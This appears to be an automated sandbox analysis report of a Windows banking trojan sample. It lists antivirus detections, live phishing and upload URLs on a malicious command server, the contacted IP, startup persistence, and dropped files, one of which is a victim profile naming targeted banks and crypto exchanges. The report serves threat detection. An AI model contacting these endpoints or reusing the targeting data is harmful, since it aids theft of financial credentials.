This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
WDnE51mua6.exe	42%	Virustotal		Browse
WDnE51mua6.exe	8%	Metadefender		Browse
WDnE51mua6.exe	65%	ReversingLabs	Win32.Trojan.Crypzip
WDnE51mua6.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	3%	Metadefender		Browse
C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	2%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.1.WDnE51mua6.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd491	100%	Avira URL Cloud	phishing
https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49r	100%	Avira URL Cloud	phishing
https://banusdoret.top/upload/upload.php	100%	Avira URL Cloud	phishing
https://banusdoret.topctionSettings	0%	Avira URL Cloud	safe
https://banusdoret.top/kh=	100%	Avira URL Cloud	phishing
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
https://banusdoret.top/8	100%	Avira URL Cloud	phishing
https://banusdoret.top/hi0	100%	Avira URL Cloud	phishing
https://banusdoret.top/upload/upload.phpmit	100%	Avira URL Cloud	phishing
https://banusdoret.top/upload/upload.phpp/hi0	100%	Avira URL Cloud	phishing
https://banusdoret.top/#hu	100%	Avira URL Cloud	phishing
https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49	100%	Avira URL Cloud	phishing
https://banusdoret.top/5hc	100%	Avira URL Cloud	phishing
https://banusdoret.top/ography	100%	Avira URL Cloud	phishing
http://cps.root	0%	Avira URL Cloud	safe
https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49lcanoconiosispZ	100%	Avira URL Cloud	phishing
https://banusdoret.top/	100%	Avira URL Cloud	phishing
http://r3.i.lencr.org/0-	0%	Avira URL Cloud	safe
https://banusdoret.top/sFt	100%	Avira URL Cloud	phishing
https://banusdoret.top/Dg	100%	Avira URL Cloud	phishing
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
https://banusdoret.top/Vg	100%	Avira URL Cloud	phishing
https://banusdoret.top/oi9	100%	Avira URL Cloud	phishing
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
banusdoret.top	8.208.95.18	true	false		unknown
zjZFqZYoOtpryMyR.zjZFqZYoOtpryMyR	unknown	unknown	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd491	nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49r	nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
https://banusdoret.top/upload/upload.php	nslookup.exe, 00000010.00000002.591747509.0000000003B37000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
https://banusdoret.topctionSettings	nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://banusdoret.top/kh=	nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmp	true	Avira URL Cloud: phishing	unknown
http://cps.letsencrypt.org0	nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://banusdoret.top/8	nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
https://banusdoret.top/hi0	nslookup.exe, 00000010.00000003.536247326.0000000003BE2000.00000004.00000001.sdmp	true	Avira URL Cloud: phishing	unknown
https://banusdoret.top/upload/upload.phpmit	nslookup.exe, 00000010.00000003.532175709.0000000003BE2000.00000004.00000001.sdmp	true	Avira URL Cloud: phishing	unknown
https://banusdoret.top/upload/upload.phpp/hi0	nslookup.exe, 00000010.00000003.532175709.0000000003BE2000.00000004.00000001.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.autoitscript.com/autoit3/X	Gia.exe.com, 00000006.00000000.354716969.0000000000985000.00000002.00020000.sdmp, Gia.exe.com, 00000007.00000002.502867230.0000000000985000.00000002.00020000.sdmp, juROhmfLml.exe.com, 0000000C.00000002.529162484.00000000002F5000.00000002.00020000.sdmp, Gia.exe.com.5.dr	false		high
https://banusdoret.top/#hu	nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmp	true	Avira URL Cloud: phishing	unknown
https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49	nslookup.exe, 00000010.00000002.591863693.0000000003B64000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
https://banusdoret.top/5hc	nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmp	true	Avira URL Cloud: phishing	unknown
https://banusdoret.top/ography	nslookup.exe, 00000010.00000002.591956638.0000000003B7E000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
https://www.autoitscript.com/autoit3/	Gia.exe.com, 00000007.00000003.481000705.0000000003800000.00000004.00000001.sdmp, Gia.exe.com.5.dr	false		high
http://cps.root	nslookup.exe, 00000010.00000003.514415275.0000000003B97000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://banusdoret.top/4624a8e10d6df3306e1dd46223b6b1968208dd49lcanoconiosispZ	nslookup.exe, 00000010.00000002.591717257.0000000003B30000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
https://banusdoret.top/	nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmp, nslookup.exe, 00000010.00000003.584413680.0000000003BE2000.00000004.00000001.sdmp	true	Avira URL Cloud: phishing	unknown
http://r3.i.lencr.org/0-	nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://banusdoret.top/sFt	nslookup.exe, 00000010.00000002.591863693.0000000003B64000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
https://banusdoret.top/Dg	nslookup.exe, 00000010.00000003.584413680.0000000003BE2000.00000004.00000001.sdmp	true	Avira URL Cloud: phishing	unknown
http://r3.o.lencr.org0	nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://banusdoret.top/Vg	nslookup.exe, 00000010.00000003.567033832.0000000003BE2000.00000004.00000001.sdmp	true	Avira URL Cloud: phishing	unknown
https://banusdoret.top/oi9	nslookup.exe, 00000010.00000003.544012619.0000000003BE2000.00000004.00000001.sdmp	true	Avira URL Cloud: phishing	unknown
http://cps.root-x1.letsencrypt.org0	nslookup.exe, 00000010.00000003.582514052.0000000003BB4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
8.208.95.18	banusdoret.top	Singapore		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	383838
Start date:	08.04.2021
Start time:	10:49:33
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 52s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	WDnE51mua6.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@35/26@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 55.9% (good quality ratio 53.2%) Quality average: 86.4% Quality standard deviation: 24.4%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.139.144, 40.88.32.150, 13.64.90.137, 52.147.198.201, 20.82.210.154, 23.10.249.26, 23.10.249.43, 104.43.193.48, 95.100.54.203, 20.54.26.129, 23.54.113.53 Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, skypedataprdcolcus16.cloudapp.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:50:40	API Interceptor	1x Sleep call for process: Gia.exe.com modified
10:50:41	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juROhmfLml.url
10:50:52	API Interceptor	1x Sleep call for process: juROhmfLml.exe.com modified
10:51:53	API Interceptor	1x Sleep call for process: WMIC.exe modified
10:51:59	API Interceptor	74x Sleep call for process: nslookup.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
8.208.95.18	5zc9vbGBo3.exe	Get hash	malicious	Browse	dolboeb1701.com/bgczXibj92HSlSCK/util.php
	InnAcjnAmG.exe	Get hash	malicious	Browse	dolboeb1701.com/bgczXibj92HSlSCK/util.php
	DP5kUHHaWs.exe	Get hash	malicious	Browse	dolboeb1701.com/bgczXibj92HSlSCK/util.php
	Zc0HsqUzyy.exe	Get hash	malicious	Browse	dolboeb1701.com/bgczXibj92HSlSCK/util.php
	8X93Tzvd7V.exe	Get hash	malicious	Browse	dolboeb1701.com/bgczXibj92HSlSCK/util.php
	u8A8Qy5S7O.exe	Get hash	malicious	Browse	dolboeb1701.com/bgczXibj92HSlSCK/util.php
	SecuriteInfo.com.Mal.GandCrypt-A.5674.exe	Get hash	malicious	Browse	dolboeb1701.com/bgczXibj92HSlSCK/util.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
banusdoret.top	yPkfbflyoh.exe	Get hash	malicious	Browse	8.208.95.18
	JYDy1dAHdW.exe	Get hash	malicious	Browse	8.208.95.18
	EppTbowa74.exe	Get hash	malicious	Browse	8.208.95.18
	tcNbszVulx.exe	Get hash	malicious	Browse	8.208.95.18
	USHrlfZEJC.exe	Get hash	malicious	Browse	8.208.95.18
	MmuRNUcd2B.exe	Get hash	malicious	Browse	8.208.95.18

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	documents-2112491607.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1660683173.xlsm	Get hash	malicious	Browse	8.211.4.209
	0406_37400496097832.doc	Get hash	malicious	Browse	8.208.95.92
	32_64_ver_2_bit.exe	Get hash	malicious	Browse	8.209.67.151
	1234.xlsm	Get hash	malicious	Browse	8.211.4.209
	12345.xlsm	Get hash	malicious	Browse	8.211.4.209
	1234.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-748443571.xlsm	Get hash	malicious	Browse	8.211.4.209
	12345.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1887159634.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-748443571.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1887159634.xlsm	Get hash	malicious	Browse	8.211.4.209
	L87N50MbDG.exe	Get hash	malicious	Browse	8.209.67.151
	documents-683917632.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-683917632.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1760163871.xlsm	Get hash	malicious	Browse	8.211.4.209
	documents-1760163871.xlsm	Get hash	malicious	Browse	8.211.4.209
	Proforma invoice.doc	Get hash	malicious	Browse	47.244.190.114
	yPkfbflyoh.exe	Get hash	malicious	Browse	8.208.95.18
	4CwmE1pYh5.exe	Get hash	malicious	Browse	47.91.72.80

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	ikoAImKWvI.exe	Get hash	malicious	Browse	8.208.95.18
	V7UnYc7CCN.exe	Get hash	malicious	Browse	8.208.95.18
	SM25.vbs	Get hash	malicious	Browse	8.208.95.18
	FQ45.vbs	Get hash	malicious	Browse	8.208.95.18
	Signed pages of agreement copy.html	Get hash	malicious	Browse	8.208.95.18
	Payment Report.html	Get hash	malicious	Browse	8.208.95.18
	dMeVLLeyLc.exe	Get hash	malicious	Browse	8.208.95.18
	avast_secure_browser_setup.exe	Get hash	malicious	Browse	8.208.95.18
	PaymentAdvice-copy.htm	Get hash	malicious	Browse	8.208.95.18
	57fvgYpwnN.exe	Get hash	malicious	Browse	8.208.95.18
	8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xls	Get hash	malicious	Browse	8.208.95.18
	9mm case for ROYAL METAL INDUSTRIES 3milmonth Specification drawings.exe	Get hash	malicious	Browse	8.208.95.18
	Scan emco Bautechni specification.pps	Get hash	malicious	Browse	8.208.95.18
	Lista e porosive te blerjes.exe	Get hash	malicious	Browse	8.208.95.18
	Notice-039539.xlsm	Get hash	malicious	Browse	8.208.95.18
	IMG_767893434432.exe	Get hash	malicious	Browse	8.208.95.18
	OH76.vbs	Get hash	malicious	Browse	8.208.95.18
	INVOICE_.EXE	Get hash	malicious	Browse	8.208.95.18
	FED8GODpaD.xlsb	Get hash	malicious	Browse	8.208.95.18
	JANUARY OVERDUE INVOICE.pdf.exe	Get hash	malicious	Browse	8.208.95.18

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com	yPkfbflyoh.exe	Get hash	malicious	Browse
	JYDy1dAHdW.exe	Get hash	malicious	Browse
	EppTbowa74.exe	Get hash	malicious	Browse
	tcNbszVulx.exe	Get hash	malicious	Browse
	USHrlfZEJC.exe	Get hash	malicious	Browse
	mcRrjT7JMX.exe	Get hash	malicious	Browse
	3MWIYkDesa.exe	Get hash	malicious	Browse
	3MWIYkDesa.exe	Get hash	malicious	Browse
	MmuRNUcd2B.exe	Get hash	malicious	Browse
	23j6ZPLfOh.exe	Get hash	malicious	Browse
	23j6ZPLfOh.exe	Get hash	malicious	Browse
	tl2uliYxhr.exe	Get hash	malicious	Browse
	xARcpdYdew.exe	Get hash	malicious	Browse
	vtg3HBN11U.exe	Get hash	malicious	Browse
	01FRraMfKS.exe	Get hash	malicious	Browse
	PzmkDJz80S.exe	Get hash	malicious	Browse
	dq1pzC7LNO.exe	Get hash	malicious	Browse
	atikmdag-patcher 1.4.7.exe	Get hash	malicious	Browse
	hfix.exe	Get hash	malicious	Browse
	atikmdag-patcher 1.4.8.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\4624a8e10d6df3306e1dd46223b6b1968208dd49 Download File
Process:	C:\Windows\SysWOW64\nslookup.exe
File Type:	data
Category:	dropped
Size (bytes):	23428
Entropy (8bit):	7.662543821371996
Encrypted:	false
SSDEEP:	384:h3Bm2JdLVjjNvWdQg8ZztS13wr7U1NVp7PqCxWG41BBnzz9dV:hxm2JdBjFgt1wr7OVpjqQsX39dV
MD5:	B83C81F14AF24C10C2ED43996409795A
SHA1:	1257FF605B3BC8E2FC0F28195481DD8A74DDAC0D
SHA-256:	C5407A1C6D5882DC61D0D9CFA6BF4D8A0E5DF1C1C25DDB1B23BF7804236A2960
SHA-512:	3724A15D91DA9315133FA18CDBDF75CCDEEE624A962E63375AF4BB99CA3A855B44CE9787687E4CE7EE0FFEE1BDBD0BD82192B504D6C07EB43D3D570564E16C2D
Malicious:	false
Preview:	{"is_interesting_client": "0","client_id": "4624a8e10d6df3306e1dd46223b6b1968208dd49","windows_version": "Microsoft Windows [Version 10.0.17134.1]","is_x64": "1","browsers": {"Chrome": "0"},"urls": {"53.com": "0","SchoolsFirstFCU.org": "0","SouthlandCU.org": "0","abesofmaine.com": "0","achievacu.com": "0","aflcioefcu.org": "0","alaskausa.org": "0","alliantcreditunion.org": "0","altabank.com ": "0","alterna.ca": "0","amazon.com": "0","americafirst.com": "0","americanexpress.com": "0","apcifcu.org ": "0","apple.com": "0","arsenalcu.com": "0","ascend.org": "0","ascu.org ": "0","asurion.com": "0","att.com": "0","bankofamerica.com": "0","bankofthewest.com": "0","bbt.com": "0","becu.org": "0","bestbay.com": "0","bestbuy.com": "0","big.one": "0","biki.com": "0","bilaxy.com": "0","binance.com": "0","binance.us": "0","bitbank.cc": "0","bitfinex": "0","bitfinex.com": "0","bitflyer.com": "0","bithumb.com": "0","bithumb.pro": "0","bitkub.com": "0","bitmax.io": "0","bitmex.com": "0","bitopro.com":

C:\Users\user\AppData\Local\Temp\cab_5036_2 Download File
Process:	C:\Windows\SysWOW64\makecab.exe
File Type:	data
Category:	dropped
Size (bytes):	1819
Entropy (8bit):	7.894468236667479
Encrypted:	false
SSDEEP:	48:JYUJf0QjN/JHrNeH0rRIRfCMHc2QvVGQc:Cwf0QjheH8kHc1Vi
MD5:	CFAF155E352CF3168AAFB3E2F147C54E
SHA1:	7404C60D379CDFB21F2E28AC02E3E8C6B2EAE1D6
SHA-256:	0ED4FF0E634BE10A9001EEBC4A49911997410967E96B33144A34AF56F5000C2E
SHA-512:	6D7ECD4B91210EE0BFE4AF8BCDEECFBFA6863F61CFBCC8D403C97C2A20D10510DA54BA0161C74FB5451A0AEF669EE87C261D24ED0BAE4D3286AB0813B843F7B7
Malicious:	false
Preview:	........CK.X..6....9).-..>..`..$.Lf. ...,.uqt).;...rW...Y._.G.M..!U.\..Q....I...4Z.t......W..Q..........u..vww...m...5.....n._....f.Z?.;.....~.e..wi..........z{......~{.'v...}.t...P.&......Z....U.f...Jo.n....&..CL?<~....\|N.....h.\|.B;U..r.j'd&`g....Z[0"."GAA..K2.V..pX..D#.X.oP.'.R..+...........^...O.g$K.....?5M..7D.a.R........f.&.Y9....\H...=K.PQ..F.R#...(SH.[..Y.5]6b.68.z...5l.B:....N....l...)...3W.b.........M.\|.e........N..K.}nd..r..........o.f...chV5.`).%iE.U...$S.#Q.rT.O...'.....d)J9.b.I.E./.I_ION'iEA..b.`..Pupq..~....?-.D...O...}.y]...j.'..5.c.S..S.\@{.X........#r.>.....k..i./....Gv.3.....v.vk.W...-....f.....>.J%.2_..W..........3..V.9...MC.B...-.wi[.bs...;.O.Q,....d...S.....i)...W...HEC..-.N.PF...N$T9U.R...:...@?.WK14.c.\|~..xY(...d.."...\|@g"HX....{E..+.....qa..{.1...i.qu...>.Yh.jO.\|.v....=x....9.d[5.D.D.{..r........}C.@3F-.e+H...D.bT......J..sHuOeV,..~.ho..j..&.`,..d.e.%d...I....4......eu.tD.%Li=..my>.P....S.m..6.I..If8......E..

C:\Users\user\AppData\Local\Temp\cab_5036_3 Download File
Process:	C:\Windows\SysWOW64\makecab.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	3.9862517516001557
Encrypted:	false
SSDEEP:	3:9ZREMSHGHT0EnUn:9cMSHGHgnn
MD5:	478B9568815F608EC7213D351CBD8CDB
SHA1:	89743EC25D75E6EA4290CF5C90C1460A8C833FE9
SHA-256:	D611A9CB064EE6F5D9ACDD2632FAFE2EB8EE0DE3DB8551B4AB42ABE3ED4F36C8
SHA-512:	A796180D4BA1BECF89A8A85AB3D2BFAB271B1F9D8697A3BF5B8DE141F5AABCFB75E515FBC7CAD21C6640B57AAB485A3B41AF098448373500DEEA8ED7DD05C1E8
Malicious:	false
Preview:	...........R}V .4624a8e10d6df3306e1dd46223b6b1968208dd49.

C:\Users\user\AppData\Local\Temp\cab_5036_4 Download File
Process:	C:\Windows\SysWOW64\makecab.exe
File Type:	data
Category:	dropped
Size (bytes):	1819
Entropy (8bit):	7.896214873025922
Encrypted:	false
SSDEEP:	48:IvYUJf0QjN/JHrNeH0rRIRfCMHc2QvVGQc:zwf0QjheH8kHc1Vi
MD5:	1A5DAC8AEB202A00C054E1C9CAC02B3D
SHA1:	9DC1BF7A70ADF481590B07D587F83185CCB6B9F9
SHA-256:	D1521BB1E2238F4587055AC303A1FB5377285B5FE607756572B83259DB8F94D5
SHA-512:	0F2D3517B42C33EC88FA1DC364E202DB2E22752B5E23E35591A0619EAE8CC9D766A5D766ECFEF1799B00AA7ACD12D4448834AAE934800A68AD39702E55AAE7DE
Malicious:	false
Preview:	L.......CK.X..6....9).-..>..`..$.Lf. ...,.uqt).;...rW...Y._.G.M..!U.\..Q....I...4Z.t......W..Q..........u..vww...m...5.....n._....f.Z?.;.....~.e..wi..........z{......~{.'v...}.t...P.&......Z....U.f...Jo.n....&..CL?<~....\|N.....h.\|.B;U..r.j'd&`g....Z[0"."GAA..K2.V..pX..D#.X.oP.'.R..+...........^...O.g$K.....?5M..7D.a.R........f.&.Y9....\H...=K.PQ..F.R#...(SH.[..Y.5]6b.68.z...5l.B:....N....l...)...3W.b.........M.\|.e........N..K.}nd..r..........o.f...chV5.`).%iE.U...$S.#Q.rT.O...'.....d)J9.b.I.E./.I_ION'iEA..b.`..Pupq..~....?-.D...O...}.y]...j.'..5.c.S..S.\@{.X........#r.>.....k..i./....Gv.3.....v.vk.W...-....f.....>.J%.2_..W..........3..V.9...MC.B...-.wi[.bs...;.O.Q,....d...S.....i)...W...HEC..-.N.PF...N$T9U.R...:...@?.WK14.c.\|~..xY(...d.."...\|@g"HX....{E..+.....qa..{.1...i.qu...>.Yh.jO.\|.v....=x....9.d[5.D.D.{..r........}C.@3F-.e+H...D.bT......J..sHuOeV,..~.ho..j..&.`,..d.e.%d...I....4......eu.tD.%Li=..my>.P....S.m..6.I..If8......E..

C:\Users\user\AppData\Local\Temp\cab_5036_5 Download File
Process:	C:\Windows\SysWOW64\makecab.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	3.9862517516001557
Encrypted:	false
SSDEEP:	3:9ZREMSHGHT0EnUn:9cMSHGHgnn
MD5:	478B9568815F608EC7213D351CBD8CDB
SHA1:	89743EC25D75E6EA4290CF5C90C1460A8C833FE9
SHA-256:	D611A9CB064EE6F5D9ACDD2632FAFE2EB8EE0DE3DB8551B4AB42ABE3ED4F36C8
SHA-512:	A796180D4BA1BECF89A8A85AB3D2BFAB271B1F9D8697A3BF5B8DE141F5AABCFB75E515FBC7CAD21C6640B57AAB485A3B41AF098448373500DEEA8ED7DD05C1E8
Malicious:	false
Preview:	...........R}V .4624a8e10d6df3306e1dd46223b6b1968208dd49.

C:\Users\user\AppData\Local\Temp\cab_5036_6 Download File
Process:	C:\Windows\SysWOW64\makecab.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:P:P
MD5:	7B5B6C7BF41E6055ABD4E74476E08575
SHA1:	5C05D3A68F69258D236F6D9677CC0A42E399E7CC
SHA-256:	2392619F397925A165CF31634781D68B006C396611C425F6C67F338356E47F8F
SHA-512:	36EF55C7B0BEAA825AB7B3A509BDD6154BE0039BF5ADD56232ECDA2237C277F4FED64235F809CCA1DC2370DA4664D8C2013A9F3EA8FB6972238EF0B10A6790E6
Malicious:	false
Preview:	........

C:\Users\user\AppData\Local\Temp\chr1073.tmp Download File
Process:	C:\Windows\SysWOW64\wbem\WMIC.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	6962
Entropy (8bit):	2.4957564851494354
Encrypted:	false
SSDEEP:	24:QXs0kWA9NPjqFcyFchmPLPmEfS6U6UOOOOWOOOOOOOOOOOOP8sOOOOOOOOOOOOOL:KfXQEX9h8qAz/q4hfSYZnClU
MD5:	F9D527CEF22C29BCAC626EAFF4201DAB
SHA1:	D2925316040A2382BF760C3D2EE324DB17C67CCC
SHA-256:	9024A75A428327B4A85E4BF616C2B968A8ECA00CFC677F1A90C5C367AC5C50F8
SHA-512:	36646450F7E68DE7FE327F368965B7C8E913565526F7D9B69EACC91F6ECC2A95A4CCD28BDE818C57787390C95A29D74A4952CB539A2980FAC76A085EEB9A4EF5
Malicious:	false
Preview:	..N.a.m.e. . . . . . . . . . . . . . . . . . . . . . . . .....S.y.s.t.e.m. .I.d.l.e. .P.r.o.c.e.s.s. . . . . . . . . .....S.y.s.t.e.m. . . . . . . . . . . . . . . . . . . . . . .....R.e.g.i.s.t.r.y. . . . . . . . . . . . . . . . . . . . .....s.m.s.s...e.x.e. . . . . . . . . . . . . . . . . . . . .....c.s.r.s.s...e.x.e. . . . . . . . . . . . . . . . . . . .....w.i.n.i.n.i.t...e.x.e. . . . . . . . . . . . . . . . . .....c.s.r.s.s...e.x.e. . . . . . . . . . . . . . . . . . . .....s.e.r.v.i.c.e.s...e.x.e. . . . . . . . . . . . . . . . .....w.i.n.l.o.g.o.n...e.x.e. . . . . . . . . . . . . . . . .....l.s.a.s.s...e.x.e. . . . . . . . . . . . . . . . . . . .....f.o.n.t.d.r.v.h.o.s.t...e.x.e. . . . . . . . . . . . . .....f.o.n.t.d.r.v.h.o.s.t...e.x.e. . . . . . . . . . . . . .....s.v.c.h.o.s.t...e.x.e. . . . . . . . . . . . . . . . . .....s.v.c.h.o.s.t...e.x.e. . . . . . . . . . . . . . . . . .....s.v.c.h.o.s.t...e.x.e. . . . . . . . . . . . . . . . . .....s.v.c.h.o.s.t...e.x.e. . . . . . . . .

C:\Users\user\AppData\Local\Temp\chr2302.tmp Download File
Process:	C:\Windows\SysWOW64\makecab.exe
File Type:	data
Category:	modified
Size (bytes):	1924
Entropy (8bit):	7.865672899473467
Encrypted:	false
SSDEEP:	48:xFiYUJf0QjN/JHrNeH0rRIRfCMHc2QvVGQH:xFlwf0QjheH8kHc1V5
MD5:	93E86307587E6C2A2C3F25DB6C3A8C34
SHA1:	157561344ABA59BCED8BC4329918951FECE872D2
SHA-256:	2DCF0197EFE740AB55785AC8ADE300796B2ED5CFFBD0B0C764AC7DEE517D2912
SHA-512:	E03D49E472FC224A151961E8850214FB6B94F5A05024E3198E0DE7127C3E6DF1903B46331BBE2ADC126257B09A71B5151FEEAF479099BC07559E400B7F765861
Malicious:	false
Preview:	!CAB............,...................e..................R}V .4624a8e10d6df3306e1dd46223b6b1968208dd49.L.......CK.X..6....9).-..>..`..$.Lf. ...,.uqt).;...rW...Y._.G.M..!U.\..Q....I...4Z.t......W..Q..........u..vww...m...5.....n._....f.Z?.;.....~.e..wi..........z{......~{.'v...}.t...P.&......Z....U.f...Jo.n....&..CL?<~....\|N.....h.\|.B;U..r.j'd&`g....Z[0"."GAA..K2.V..pX..D#.X.oP.'.R..+...........^...O.g$K.....?5M..7D.a.R........f.&.Y9....\H...=K.PQ..F.R#...(SH.[..Y.5]6b.68.z...5l.B:....N....l...)...3W.b.........M.\|.e........N..K.}nd..r..........o.f...chV5.`).%iE.U...$S.#Q.rT.O...'.....d)J9.b.I.E./.I_ION'iEA..b.`..Pupq..~....?-.D...O...}.y]...j.'..5.c.S..S.\@{.X........#r.>.....k..i./....Gv.3.....v.vk.W...-....f.....>.J%.2_..W..........3..V.9...MC.B...-.wi[.bs...;.O.Q,....d...S.....i)...W...HEC..-.N.PF...N$T9U.R...:...@?.WK14.c.\|~..xY(...d.."...\|@g"HX....{E..+.....qa..{.1...i.qu...>.Yh.jO.\|.v....=x....9.d[5.D.D.{..r........}C.@3F-.e+H...D.bT..

C:\Users\user\AppData\Local\Temp\chrB32.tmp Download File
Process:	C:\Windows\SysWOW64\nslookup.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
